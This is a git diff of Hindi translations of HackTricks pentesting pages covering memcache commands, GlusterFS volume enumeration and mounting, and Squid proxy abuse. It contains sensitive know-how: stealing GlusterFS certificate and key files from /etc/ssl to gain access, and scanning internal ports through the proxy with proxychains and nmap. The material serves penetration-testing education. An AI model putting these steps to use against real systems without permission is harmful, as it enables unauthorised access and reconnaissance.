Translated ['network-services-pentesting/11211-memcache/memcache-command

This commit is contained in:
Translator 2024-02-08 23:24:36 +00:00
parent 672fb5b7ed
commit b2d3341f07
7 changed files with 171 additions and 340 deletions

View file

@ -1,57 +1,59 @@
# Memcache कमांड्स
# Memcache Commands
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपना योगदान दें।**
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**।**
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs जमा करके।
</details>
## कमांड्स चीट-शीट
## Commands Cheat-Sheet
**स्रोत से** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)\*\*\*\*
**से** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)
समर्थित कमांड्स (आधिकारिक और कुछ अनौपचारिक) [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) दस्तावेज़ में दर्ज हैं।
समर्थित कमांड (आधिकारिक और कुछ अनौपचारिक) [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) दस्तावेज़ में दर्ज हैं।
दुःख की बात है कि वाक्यांश विवरण वास्तव में स्पष्ट नहीं है और मौजूदा कमांड्स की सूची देने के लिए एक साधारण मदद कमांड बेहतर होगी। यहां आपको [स्रोत](https://github.com/memcached/memcached) में पाए जाने वाले कमांड्स का एक अवलोकन है (19.08.2016 के रूप में):
दुःख की बात है कि वाक्य-रचना विवरण वास्तव में स्पष्ट नहीं है और मौजूदा कमांड्स की सूची देने वाला एक सरल मदद कमांड बेहतर होगा। यहाँ एक अवलोकन है जिसे आप [स्रोत](https://github.com/memcached/memcached) में पा सकते हैं (19.08.2016 के रूप में):
| कमांड | विवरण | उदाहरण |
| --------------------- | --------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| get | एक मान पढ़ता है | `get mykey` |
| set | एक कुंजी को बिना शर्त के सेट करें | <p><code>set mykey &#x3C;flags> &#x3C;ttl> &#x3C;size></code><br><br>&#x3C;p>Unix CLI उपकरणों का उपयोग करते समय \r\n का उपयोग करने का सुनिश्चित करें। उदाहरण के लिए&#x3C;/p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| add | एक नई कुंजी जोड़ें | `add newkey 0 60 5` |
| replace | मौजूदा कुंजी को अधिलेखित करें | `replace key 0 60 5` |
| append | मौजूदा कुंजी में डेटा जोड़ें | `append key 0 60 15` |
| prepend | मौजूदा कुंजी में डेटा प्रीपेंड करें | `prepend key 0 60 15` |
| incr | दिए गए संख्यात्मक कुंजी मान को बढ़ाता है | `incr mykey 2` |
| decr | दिए गए संख्यात्मक कुंजी मान को कम करता है | `decr mykey 5` |
| delete | मौजूदा कुंजी को हटा देता है | `delete mykey` |
| flush\_all | सभी आइटमों को तत्काल अमान्य करें | `flush_all` |
| flush\_all | n सेकंड में सभी आइटमों को अमान्य करें | `flush_all 900` |
| stats | सामान्य आंकड़े प्रिंट करें | `stats` |
| | मेमोरी आंकड़े प्रिंट करें | `stats slabs` |
| | उच्च स्तरीय आवंटन आंकड़े प्रिंट करें | `stats malloc` |
| | आइटम्स पर जानकारी प्रिंट करें | `stats items` |
| --------------------- | ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| get | मान पढ़ता है | `get mykey` |
| set | एक कुंजी को अविश्वसनीय रूप से सेट करें | <p><code>set mykey &#x3C;flags> &#x3C;ttl> &#x3C;size></code><br><br>&#x3C;p>Unix CLI उपकरणों का उपयोग करते समय \r\n को लाइन ब्रेक के रूप में सुनिश्चित करें। उदाहरण के लिए।<code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| add | एक नई कुंजी जोड़ें | `add newkey 0 60 5` |
| replace | मौजूदा कुंजी को अधिग्रहण करें | `replace key 0 60 5` |
| append | मौजूदा कुंजी में डेटा जोड़ें | `append key 0 60 15` |
| prepend | मौजूदा कुंजी में डेटा प्रीपेंड करें | `prepend key 0 60 15` |
| incr | दिए गए संख्यात्मक कुंजी मान को बढ़ाता है | `incr mykey 2` |
| decr | दिए गए संख्यात्मक कुंजी मान को घटाता है | `decr mykey 5` |
| delete | मौजूदा कुंजी को हटाता है | `delete mykey` |
| flush\_all | सभी आइटमों को तुरंत अमान्य करें | `flush_all` |
| flush\_all | n सेकंड में सभी आइटमों को अमान्य करें | `flush_all 900` |
| stats | सामान्य सांख्यिकी प्रिंट करें | `stats` |
| | मेमोरी सांख्यिकी प्रिंट करें | `stats slabs` |
| | उच्च स्तरीय आवंटन सांख्यिकी प्रिंट करें | `stats malloc` |
| | आइटम्स पर जानकारी प्रिंट करें | `stats items` |
| | | `stats detail` |
| | | `stats sizes` |
| | सांख्यिकी गणना रीसेट करें | `stats reset` |
| lru\_crawler metadump | कैश में (सभी) आइटमों के लिए मेटाडेटा डंप करें | `lru_crawler metadump all` |
| version | सर्वर संस्करण प्रिंट करें | `version` |
| verbosity | लॉग स्तर बढ़ाएं | `verbosity` |
| quit | सत्र समाप्त करें | `quit` |
| | सांख्यिकी गणना रीसेट करें | `stats reset` |
| lru\_crawler metadump | कैश में आइटमों के (अधिकांश) मेटाडेटा डंप करें | `lru_crawler metadump all` |
| version | सर्वर संस्करण प्रिंट करें | `version` |
| verbosity | लॉग स्तर बढ़ाता है | `verbosity` |
| quit | सत्र समाप्त करें | `quit` |
#### ट्रैफिक सांख्यिकी <a href="#traffic-statistics" id="traffic-statistics"></a>
आप वर्तमान ट्रैफिक सांख्यिकी का अनुरोध कमांड का उपयोग करके कर सकते हैं
आप वर्तमान ट्रैफिक सांख्यिकी का प्रश्न कर सकते हैं उपयोग करके
```
stats
```
आपको एक सूची मिलेगी जिसमें कनेक्शन की संख्या, इनपुट/आउटपुट में बाइट और बहुत कुछ होगा
आपको एक सूची मिलेगी जो कनेक्शन की संख्या, आउट/इन बाइट्स और अधिक की सेवा करेगी
उदाहरण आउटपुट:
```
@ -80,113 +82,10 @@ STAT threads 1
END
```
#### मेमोरी सांख्यिकी <a href="#memory-statistics" id="memory-statistics"></a>
आप वर्तमान मेमोरी सांख्यिकी को क्वेरी कर सकते हैं।
```
stats slabs
```
# Memcache Commands
Memcache is an in-memory key-value store that is commonly used for caching data in web applications. It is a distributed caching system that allows you to store and retrieve data quickly.
## Basic Commands
### SET
**Description:** The SET command is used to store a key-value pair in the memcache.
**Syntax:** `SET <key> <flags> <exptime> <bytes> [noreply]\r\n<data block>\r\n`
- `<key>`: The key to store the data.
- `<flags>`: Optional flags to store additional metadata.
- `<exptime>`: The expiration time in seconds.
- `<bytes>`: The size of the data block in bytes.
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
**Example:** `SET mykey 0 3600 5\r\nhello\r\n`
### GET
**Description:** The GET command is used to retrieve the value associated with a key from the memcache.
**Syntax:** `GET <key>\r\n`
- `<key>`: The key to retrieve the value.
**Example:** `GET mykey\r\n`
### DELETE
**Description:** The DELETE command is used to remove a key-value pair from the memcache.
**Syntax:** `DELETE <key>\r\n`
- `<key>`: The key to delete.
**Example:** `DELETE mykey\r\n`
## Advanced Commands
### INCR
**Description:** The INCR command is used to increment the value associated with a key in the memcache.
**Syntax:** `INCR <key> <value>\r\n`
- `<key>`: The key to increment the value.
- `<value>`: The value to increment by.
**Example:** `INCR mykey 1\r\n`
### DECR
**Description:** The DECR command is used to decrement the value associated with a key in the memcache.
**Syntax:** `DECR <key> <value>\r\n`
- `<key>`: The key to decrement the value.
- `<value>`: The value to decrement by.
**Example:** `DECR mykey 1\r\n`
### APPEND
**Description:** The APPEND command is used to append data to the value associated with a key in the memcache.
**Syntax:** `APPEND <key> <bytes> [noreply]\r\n<data block>\r\n`
- `<key>`: The key to append the data.
- `<bytes>`: The size of the data block to append in bytes.
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
**Example:** `APPEND mykey 5\r\nworld\r\n`
### PREPEND
**Description:** The PREPEND command is used to prepend data to the value associated with a key in the memcache.
**Syntax:** `PREPEND <key> <bytes> [noreply]\r\n<data block>\r\n`
- `<key>`: The key to prepend the data.
- `<bytes>`: The size of the data block to prepend in bytes.
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
**Example:** `PREPEND mykey 5\r\nhello\r\n`
### CAS
**Description:** The CAS command is used to check and set a value in the memcache using a unique identifier.
**Syntax:** `CAS <key> <flags> <exptime> <bytes> <cas unique> [noreply]\r\n<data block>\r\n`
- `<key>`: The key to check and set the value.
- `<flags>`: Optional flags to store additional metadata.
- `<exptime>`: The expiration time in seconds.
- `<bytes>`: The size of the data block in bytes.
- `<cas unique>`: The unique identifier for the value.
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
**Example:** `CAS mykey 0 3600 5 123456\r\nhello\r\n`
उदाहरण आउटपुट:
```
STAT 1:chunk_size 80
STAT 1:chunks_per_page 13107
@ -207,34 +106,17 @@ STAT active_slabs 3
STAT total_malloced 3145436
END
```
यदि आपको यकीन नहीं है कि आपके मेमकैश्ड इंस्टेंस के लिए पर्याप्त मेमोरी है या नहीं, तो हमेशा "स्टैट्स" कमांड द्वारा दिए गए "इविक्शन्स" काउंटर के लिए ध्यान दें। यदि आपके पास इंस्टेंस के लिए पर्याप्त मेमोरी है, तो "इविक्शन्स" काउंटर 0 होना चाहिए या कम से कम बढ़ नहीं रहा होना चाहिए।
#### कौन से कुंजी उपयोग में हैं? <a href="#which-keys-are-used" id="which-keys-are-used"></a>
#### कौन से कीज़ उपयोग किए जाते हैं? <a href="#which-keys-are-used" id="which-keys-are-used"></a>
वर्तमान सेट की सीधी तरीके से निर्धारित करने के लिए कोई अंतर्निहित फ़ंक्शन नहीं है। हालांकि, आप निम्नलिखित कमांड का उपयोग कर सकते हैं।
यदि आपको यह नहीं पता है कि आपके मेमकैश्ड इंस्टेंस के लिए पर्याप्त मेमोरी है या नहीं, तो हमेशा "स्टैट्स" कमांड द्वारा दिए गए "इविक्शन्स" काउंटर का ध्यान रखें। यदि आपके पास इंस्टेंस के लिए पर्याप्त मेमोरी है तो "इविक्शन्स" काउंटर 0 होना चाहिए या कम से कम बढ़ नहीं रहा होना चाहिए।
```
stats items
```
## Command to Determine How Many Keys Exist
To determine the number of keys that exist in a Memcache server, you can use the `stats` command. This command provides statistics about the server, including the total number of keys stored.
To execute the command, follow these steps:
1. Connect to the Memcache server using a Memcache client.
2. Send the `stats` command to the server.
3. Parse the response to extract the value of the `curr_items` field.
Here is an example of how to execute the command using Telnet:
**Command to determine how many keys do exist:**
```bash
$ telnet <memcache_server_ip> 11211
stats
stats items
```
The server will respond with a list of statistics. Look for the line that starts with `STAT curr_items` and note the value after it. This value represents the number of keys currently stored in the Memcache server.
Keep in mind that the `stats` command provides various other statistics as well, which can be useful for monitoring and troubleshooting purposes.
```
stats items
STAT items:1:number 220
@ -244,16 +126,4 @@ STAT items:2:age 1405
[...]
END
```
यह कम से कम मदद करता है कि क्या कोई कुंजी का उपयोग किया जाता है। मेमकैश एक्सेस करने वाले एक PHP स्क्रिप्ट से कुंजी नामों को डंप करने के लिए आप [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) से PHP कोड का उपयोग कर सकते हैं।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
यह कम से कम यह देखने में मदद करता है कि क्या कोई कुंजीयों का उपयोग हो रहा है। PHP स्क्रिप्ट से कुंजी नामों को डंप करने के लिए जो पहले से ही मेमकैश एक्सेस करता है, उसका उपयोग करने के लिए आप [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) से PHP कोड का उपयोग कर सकते हैं।

View file

@ -1,61 +1,46 @@
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
# मूल जानकारी
**GlusterFS** एक **वितरित**, मनमाने ढंग से स्केलेबल **फाइल सिस्टम** है जो **कई सर्वरों** से स्टोरेज कॉम्पोनेंट्स को एकीकृत करता है एक समान फाइल सिस्टम में.
**GlusterFS** एक **वितरित फ़ाइल सिस्टम** है जो कई सर्वरों से स्टोरेज को एक **एकीकृत सिस्टम** में जोड़ता है। यह **अनियमित स्केलेबिलिटी** की अनुमति देता है, जिसका मतलब है कि आप आसानी से स्टोरेज सर्वर जोड़ सकते हैं या हटा सकते हैं बिना कुल फ़ाइल सिस्टम को बाधित किए। यह आपके डेटा के लिए उच्च **उपलब्धता** और **क्षमता** सुनिश्चित करता है। GlusterFS के साथ, आप अपने फ़ाइलों तक पहुँच सकते हैं जैसे कि वे स्थानीय रूप से स्टोर किए गए हों, चाहे उपस्थित सर्वर बुनियादी हो। यह एक शक्तिशाली और लचीला समाधान प्रदान करता है बड़ी मात्रा में डेटा को कई सर्वरों पर प्रबंधित करने के लिए।
**डिफ़ॉल्ट पोर्ट्स**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (आगे से)\
पोर्ट 49152 के लिए, अधिक ईंटों का उपयोग करने के लिए 1 से बढ़ा हुआ पोर्ट्स खुले होने चाहिए। _पहले 24009 पोर्ट का उपयोग 49152 के बजाय किया जाता था।_
**डिफ़ॉल्ट पोर्ट्स**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (आगे)\
पोर्ट 49152 के लिए, 1 से बढ़ते हुए पोर्ट्स को खोलने की आवश्यकता है अधिक bricks का उपयोग करने के लिए। _पहले पोर्ट 24009 का उपयोग 49152 के बजाय किया गया था।_
```
PORT STATE SERVICE
24007/tcp open rpcbind
49152/tcp open ssl/unknown
```
## परिगणना
## जाँच
इस फाइल सिस्टम के साथ इंटरैक्ट करने के लिए आपको [**GlusterFS क्लाइंट**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) को इंस्टॉल करना होगा (`sudo apt-get install glusterfs-cli`).
इस फ़ाइल सिस्टम के साथ बातचीत करने के लिए आपको [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) को इंस्टॉल करने की आवश्यकता है (`sudo apt-get install glusterfs-cli`).
उपलब्ध वॉल्यूम्स को सूचीबद्ध करने और माउंट करने के लिए आप इस्तेमाल कर सकते हैं:
उपलब्ध वॉल्यूम की सूची देखने और माउंट करने के लिए आप इस्तेमाल कर सकते हैं:
```bash
sudo gluster --remote-host=10.10.11.131 volume list
# This will return the name of the volumes
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
```
यदि आपको **फाइल सिस्टम माउंट करने की कोशिश में त्रुटि** मिलती है, तो आप `/var/log/glusterfs/` में लॉग्सेक कर सकते हैं।
यदि आपको **फाइल सिस्टम को माउंट करने में त्रुटि** मिलती है, तो आप `/var/log/glusterfs/` में लॉग जांच सकते हैं।
**प्रमाणपत्रों का उल्लेख करने वाली त्रुटियां** फाइलों को चुराकर ठीक की जा सकती हैं (यदि आपके पास सिस्टम तक पहुंच है):
**प्रमाणपत्रों का उल्लेख करने वाली त्रुटियों** को ठीक किया जा सकता है जब आप सिस्टम तक पहुंच पाते हैं और निम्नलिखित फ़ाइलें चुरा लेते हैं:
* /etc/ssl/glusterfs.ca
* /etc/ssl/glusterfs.key
* /etc/ssl/glusterfs.ca.pem
और उन्हें अपने मशीन के `/etc/ssl` या `/usr/lib/ssl` डायरेक्टरी में स्टोर करें (यदि अलग डायरेक्टरी का उपयोग किया जाता है तो लॉग्स में इसी तरह की पंक्तियों की जांच करें: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_")।
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
और उन्हें अपनी मशीन में `/etc/ssl` या `/usr/lib/ssl` निर्देशिका में स्टोर करें (यदि एक विभिन्न निर्देशिका का उपयोग किया गया है तो लॉग में "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" जैसी लाइनों की जांच करें)।

View file

@ -1,42 +1,44 @@
<details>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग तरकीबें साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
* अगर आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details>
# मूल जानकारी
**Squid** एक कैशिंग और फॉरवर्डिंग HTTP वेब प्रॉक्सी है। इसका उपयोग विविध प्रकार से किया जाता है, जिसमें बार-बार की गई अनुरोधों को कैशिंग करके वेब सर्वर की गति बढ़ाना, वेब, DNS और अन्य कंप्यूटर नेटवर्क लुकअप्स को कैशिंग करना शामिल है, जो नेटवर्क संसाधनों को साझा करने वाले लोगों के लिए है, और ट्रैफिक फिल्टरिंग करके सुरक्षा में सहायता करना। मुख्य रूप से HTTP और FTP के लिए उपयोग किया जाता है, Squid में इंटरनेट गोफर, SSL, TLS और HTTPS सहित कई अन्य प्रोटोकॉल के लिए सीमित समर्थन शामिल है। Squid SOCKS प्रोटोकॉल का समर्थन नहीं करता है, जैसे कि Privoxy, जिसके साथ Squid का उपयोग SOCKS समर्थन प्रदान करने के लिए किया जा सकता है। (यहाँ से [here](https://en.wikipedia.org/wiki/Squid\_\(software\))).
[Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)) से:
> **Squid** एक कैशिंग और फॉरवर्डिंग HTTP वेब प्रॉक्सी है। इसका व्यापक उपयोग है, जिसमें एक वेब सर्वर को तेज करने के लिए दोहराए गए अनुरोधों को कैश करके, एक समूह के लोगों के लिए वेब, DNS और अन्य कंप्यूटर नेटवर्क खोजों को कैश करके और सुरक्षा में मदद करके ट्रैफिक को फ़िल्टर करके। हालांकि, मुख्य रूप से HTTP और FTP के लिए उपयोग किया जाता है, Squid में इंटरनेट गोफर, SSL, TLS और HTTPS सहित कई अन्य प्रोटोकॉलों के लिए सीमित समर्थन शामिल है। Squid SOCKS प्रोटोकॉल का समर्थन नहीं करता है, जिसके विपरीत, Squid को SOCKS समर्थन प्रदान करने के लिए उपयोग किया जा सकता है।
**डिफ़ॉल्ट पोर्ट:** 3128
```
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.11
```
# गणना
# जांच
## वेब प्रॉक्सी
आप इस खोजी गई सेवा को अपने ब्राउज़र में प्रॉक्सी के रूप में सेट करने का प्रयास कर सकते हैं। हालांकि, यदि यह HTTP प्रमाणीकरण के साथ कॉन्फ़िगर किया गया है तो आपसे उपयोगकर्ता नाम और पासवर्ड के लिए प्रॉम्प्ट किया जाएगा।
आप इस खोजी गई सेवा को अपने ब्राउज़र में प्रॉक्सी के रूप में सेट करने का प्रयास कर सकते हैं। हालांकि, यदि यह HTTP प्रमाणीकरण के साथ कॉन्फ़िगर किया गया है तो आपको उपयोक्ता नाम और पासवर्ड के लिए पूछा जाएगा।
```bash
# Try to proxify curl
curl --proxy http://10.10.11.131:3128 http://10.10.11.131
```
## Nmap का प्रॉक्सीफाइड उपयोग
## Nmap प्रॉक्सीकृत
आप प्रॉक्सी का दुरुपयोग करके **आंतरिक पोर्ट्स को प्रॉक्सीफाइड nmap के जरिए स्कैन** करने का प्रयास भी कर सकते हैं।\
प्रॉक्सीचेन्स को स्क्विड प्रॉक्सी का उपयोग करने के लिए कॉन्फ़िगर करें, प्रॉक्सीचेन्स.conf फ़ाइल के अंत में निम्नलिखित पंक्ति जोड़ें: `http 10.10.10.10 3128`
आप प्रॉक्सी का दुरुपयोग करके **एनमैप को प्रॉक्सीकृत करके आंतरिक पोर्ट स्कैन करने** की कोशिश भी कर सकते हैं।\
proxichains.conf फ़ाइल के अंत में निम्नलिखित पंक्ति जोड़कर squid प्रॉक्सी का उपयोग करने के लिए proxychains को कॉन्फ़िगर करें: `http 10.10.10.10 3128`
फिर प्रॉक्सीचेन्स के साथ nmap चलाएं ताकि **स्थानीय होस्ट को स्कैन किया जा सके**: `proxychains nmap -sT -n -p- localhost`
